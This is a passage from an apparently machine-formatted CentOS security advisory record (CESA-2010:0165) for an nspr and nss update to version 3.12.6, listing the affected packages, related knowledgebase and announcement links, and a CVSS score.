about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028639.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028640.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028645.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028646.html\n\n**Affected packages:**\nnspr\nnspr-devel\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0165.html", "edition": 3, "modified": "2010-03-28T20:10:58", "published": "2010-03-28T15:36:50", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028640.html", "id": "CESA-2010:0165", "title": "nspr, nss security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}]}
